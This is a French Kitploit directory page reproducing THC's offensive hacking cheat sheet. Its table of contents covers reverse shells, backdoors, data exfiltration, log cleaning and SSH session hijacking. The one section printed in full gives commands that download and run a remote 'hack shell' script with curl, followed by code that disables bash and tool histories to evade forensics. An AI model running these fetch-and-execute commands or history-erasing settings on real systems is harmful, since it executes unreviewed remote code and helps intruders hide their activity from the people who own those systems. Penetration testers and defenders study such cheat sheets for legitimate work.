Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/hackerschoice/thc-tips-tricks-hacks-cheat-sheet
OSINT (Renseignement de Sources Ouvertes)Mécanismes de PersistanceMouvement LatéralExfiltration de DonnéesCollecte d'InformationsPost-ExploitationTests d'IntrusionRed TeamingRessources Organisées

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Développement de Charges Utiles
GitHubhackerschoice/thc-tips-tricks-hacks-cheat-sheet

thc-tips-tricks-hacks-cheat-sheet

Astuces et conseils divers

Voir le dépôt
3.9k47154il y a 3 moisVérifié par Kitploit

Les trucs, astuces et hacks préférés de THC (Aide-mémoire)

https://thc.org/tips

Une collection de nos astuces préférées. Beaucoup de ces astuces ne viennent pas de nous. Nous nous contentons de les collecter.

Nous montrons les astuces telles quelles, sans expliquer pourquoi elles fonctionnent. Vous devez connaître Linux pour comprendre comment et pourquoi elles fonctionnent.

Vous avez des astuces ? Rejoignez-nous https://thc.org/ops

  1. Bash
    1. Configurer un Hack Shell
    2. Masquer vos commandes
    3. Masquer les options de votre ligne de commande
    4. Masquer une connexion réseau
    5. Masquer un processus en tant qu'utilisateur
    6. Masquer un processus en tant que root
    7. Masquer des scripts
    8. Se cacher de cat
    9. Exécuter en parallèle avec des fichiers journaux séparés
  2. SSH
    1. SSH presque invisible
    2. Plusieurs shells via une connexion SSH/TCP
    3. Tunnel SSH
    4. Tunnel SSH socks5
    5. SSH vers un hôte NATé
    6. Pivot SSH via ProxyJump
    7. SSHD en tant qu'utilisateur
  3. Réseau
    1. Découvrir des hôtes
    2. Tcpdump
    3. Tunnel et redirection
      1. Ports TCP bruts inversés
      2. Redirections inversées HTTPS
      3. Faire rebondir le trafic avec iptables
      4. IP fantôme / Usurpation d'IP
      5. Divers
    4. Utiliser n'importe quel outil via un proxy Socks
    5. Trouver votre adresse IP publique
    6. Vérifier l'accessibilité depuis le monde entier
    7. Vérifier/Scanner les ports ouverts
    8. Craquer les hashs de mots de passe
    9. Forcer les mots de passe / clés par brute force
  4. Téléversement / Téléchargement / Exfiltration de données
    1. Encodage / Décodage de fichiers
    2. Transfert de fichiers par couper-coller
    3. Transfert de fichiers avec tmux
    4. Transfert de fichiers avec screen
    5. Transfert de fichiers avec gs-netcat et sftp
    6. Transfert de fichiers via HTTP
    7. Téléchargement de fichiers sans curl
    8. Transfert de fichiers avec rsync
    9. Transfert de fichiers vers des sites de dépôt publics
    10. Transfert de fichiers via WebDAV
    11. Transfert de fichiers vers Telegram
  5. Reverse Shell / Dumb Shell
    1. Reverse Shells
      1. avec gs-netcat (chiffré)
      2. avec Bash
      3. avec cURL (chiffré)
      4. avec cURL (en clair)
      5. avec OpenSSL (chiffré)
      6. avec remote.moe (chiffré)
      7. sans /dev/tcp
      8. avec Python
      9. avec Perl
      10. avec PHP
    2. Améliorer le shell bancal
      1. Faire passer un reverse shell à un shell pty
      2. Faire passer un reverse shell à un shell entièrement interactif
      3. Reverse shell avec socat (entièrement interactif)
  6. Backdoors
    1. gs-netcat
    2. sshx.io
    3. La plus petite backdoor SSHD
    4. Accès à distance à tout un réseau
    5. La plus petite backdoor PHP
    6. La plus petite backdoor par tunnel DNS inversé
    7. Backdoor root locale
    8. Implant auto-extractible
  7. Reconnaissance d'hôtes
  8. Astuces Shell
    1. Déchiqueter des fichiers (suppression sécurisée)
    2. Restaurer la date d'un fichier
    3. Nettoyer les fichiers journaux
    4. Masquer des fichiers à un utilisateur sans privilèges root
    5. Rendre un fichier immuable
    6. Changer d'utilisateur sans sudo/su
    7. Offusquer et chiffrer un payload
    8. Déployer une backdoor sans toucher au système de fichiers
  9. Cryptographie
    1. Générer rapidement un mot de passe aléatoire
    2. Systèmes de fichiers chiffrés transportables Linux
      1. cryptsetup
      2. EncFS
    3. Chiffrer un fichier
  10. Sniffing et détournement de session
    1. Sniffer la session SHELL d'un utilisateur
    2. Sniffer toutes les sessions SHELL avec dtrace
    3. Sniffer toutes les sessions SHELL avec eBPF
    4. Sniffer la session SSH ou SSHD d'un utilisateur avec strace
    5. Sniffer la session SSH sortante d'un utilisateur avec un script wrapper
    6. Sniffer la session SSH sortante d'un utilisateur avec SSH-IT
    7. Détourner / Prendre le contrôle d'une session SSH en cours
  11. VPN et Shells
    1. Serveurs root jetables
    2. Fournisseurs VPN/VPS
  12. Collecte de renseignements OSINT
  13. Divers
    1. Outils du métier
    2. Commandes Linux sympas
    3. Aide-mémoire tmux
    4. Commandes utiles
  14. Comment devenir un hacker
  15. Autres sites

1. Bash / Shell

1.i. Configurer un Hack Shell (bash) :

Rend BASH moins bruyant. Désactive ~/.bash_history et beaucoup d'autres choses.```sh source <(curl -SsfL https://thc.org/hs)

URL alternative :```sh
 source <(curl -SsfL https://github.com/hackerschoice/hackshell/raw/main/hackshell.sh)

Et s'il n'y a pas de curl/wget, utilisez surl et curl installé (temporairement) avec bin curl.```sh source <(surl https://raw.githubusercontent.com/hackerschoice/hackshell/main/hackshell.sh)

Afterwards type bin curl to (temporarily) install curl (in memory).

HackShell fait bien plus, mais surtout ceci :```sh
unset HISTFILE
[ -n "$BASH" ] && export HISTFILE="/dev/null"
export BASH_HISTORY="/dev/null"
export LANG=en_US.UTF-8
locale -a 2>/dev/null|grep -Fqim1 en_US.UTF || export LANG=en_US
export LESSHISTFILE=-
export REDISCLI_HISTFILE=/dev/null
export MYSQL_HISTFILE=/dev/null
TMPDIR="/tmp"
[ -d "/var/tmp" ] && TMPDIR="/var/tmp"
[ -d "/dev/shm" ] && TMPDIR="/dev/shm"
export TMPDIR
export PATH=".:${PATH}"
if [[ "$SHELL" == *"zsh" ]]; then
    PS1='%F{red}%n%f@%F{cyan}%m %F{magenta}%~ %(?.%F{green}.%F{red})%#%f '
else
    PS1='\[\033[36m\]\u\[\033[m\]@\[\033[32m\]\h:\[\033[33;1m\]\w\[\033[m\]\$ '
fi
alias wget='wget --no-hsts'
alias vi="vi -i NONE"
alias vim="vim -i NONE"
alias screen="screen -ln"
Télécharger l’outil